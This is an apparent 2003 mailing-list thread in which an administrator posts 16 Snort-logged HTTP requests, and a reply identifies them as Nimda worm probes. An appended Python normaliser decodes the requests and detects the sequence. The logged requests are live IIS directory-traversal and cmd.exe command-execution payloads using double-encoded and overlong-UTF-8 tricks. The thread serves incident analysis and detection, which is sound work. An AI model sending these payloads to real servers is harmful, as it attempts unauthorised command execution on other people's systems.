RE: Same sequence...
From: Henderson, Dennis K. (Dennis.Henderson@umb.com)
Date: Tue Dec 02 2003 - 06:26:03 CST
It's probably a real Nimda-infected host.
Dennis
-----Original Message-----
From: Dejan Markovic [mailto:dejanmarkovic@hotmail.com]
Sent: Monday, December 01, 2003 2:02 PM
To: INCIDENTS@securityfocus.com
Subject: Same sequence...
Hi Guys,
Sent this one to the wrong group the first time, thanks J, so here goes.
Does anyone know which tool is being used for this scan? Snort has been
logging the same sequence of scans from various IPs to all Web servers on my
network, regardless of the fact that some are IIS and the others Apache. The data is
included below.
====================================================================
(1) WEB-IIS CodeRed v2 root.exe access GET /scripts/root.exe?/c+dir HTTP/1.0
(2) WEB-IIS CodeRed v2 root.exe access GET /MSADC/root.exe?/c+dir HTTP/1.0
(3) WEB-IIS cmd.exe access GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
(4) WEB-IIS cmd.exe access GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
(5) WEB-IIS unicode directory traversal attempt GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(6) WEB-FRONTPAGE /_vti_bin/ access GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(7) WEB-IIS _mem_bin access GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(8) WEB-IIS unicode directory traversal attempt GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(9) WEB-IIS unicode directory traversal attempt GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(10) WEB-IIS cmd.exe access GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(11) WEB-IIS unicode directory traversal attempt GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(12) WEB-IIS unicode directory traversal attempt GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(13) WEB-IIS cmd.exe access GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(14) WEB-IIS cmd.exe access GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(15) WEB-IIS cmd.exe access GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(16) WEB-IIS cmd.exe access GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
====================================================================
The whole scan takes from 2 seconds to under a minute in some cases, but
there are always 16 requests in the same order. Sorry if this has already
been on the list, and thanks.
Regards,
Dan
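Added example, not part of the thread: a small Python normaliser that decodes the 16 probe URIs quoted above the way the vulnerable IIS decoder did (iterated percent-decoding for %255c-style double encoding, lenient overlong two-byte UTF-8 for %c0%af and %c1%9c, backslash as separator) and checks whether a source sent that exact 16-step sequence. The probe list is copied from the alerts; the EXPECTED targets and the lenient decoder behaviour are my assumptions, chosen so every traversal variant collapses to the same file.

```python
from urllib.parse import unquote_to_bytes

# The 16 request-URIs from the Snort alerts in the post, in arrival order.
NIMDA_PROBES = [
    "/scripts/root.exe?/c+dir",
    "/MSADC/root.exe?/c+dir",
    "/c/winnt/system32/cmd.exe?/c+dir",
    "/d/winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%252f../winnt/system32/cmd.exe?/c+dir",
]
# Assumed resolution of each probe once decoded: the last twelve are all the
# same cmd.exe reached through different traversal encodings.
EXPECTED = ["/scripts/root.exe", "/MSADC/root.exe", "/c/winnt/system32/cmd.exe",
            "/d/winnt/system32/cmd.exe"] + ["/winnt/system32/cmd.exe"] * 12

def iis_normalise(uri):
    """Decode like the flawed IIS decoder (assumed): percent-decode until stable,
    accept overlong 2-byte UTF-8, treat \\ as /, resolve '..' but never above root."""
    raw = uri.split("?", 1)[0].encode()
    while (nxt := unquote_to_bytes(raw)) != raw:   # %255c -> %5c -> backslash
        raw = nxt
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):   # overlong lead byte
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))  # %c0%af -> /
            i += 2
        else:
            out.append(raw[i])
            i += 1
    parts = []
    for seg in out.decode("latin-1").replace("\\", "/").split("/"):
        if seg == "..":
            parts = parts[:-1]          # clamp at the web root
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts)

def is_nimda_sequence(uris):
    """True when a source has sent exactly the 16-step sequence from the post."""
    return [iis_normalise(u) for u in uris] == EXPECTED
```

Run against one source's requests in order; a hit on all 16 normalised targets is the fixed scan the post describes, while a partial match is worth a look but is not the same signature.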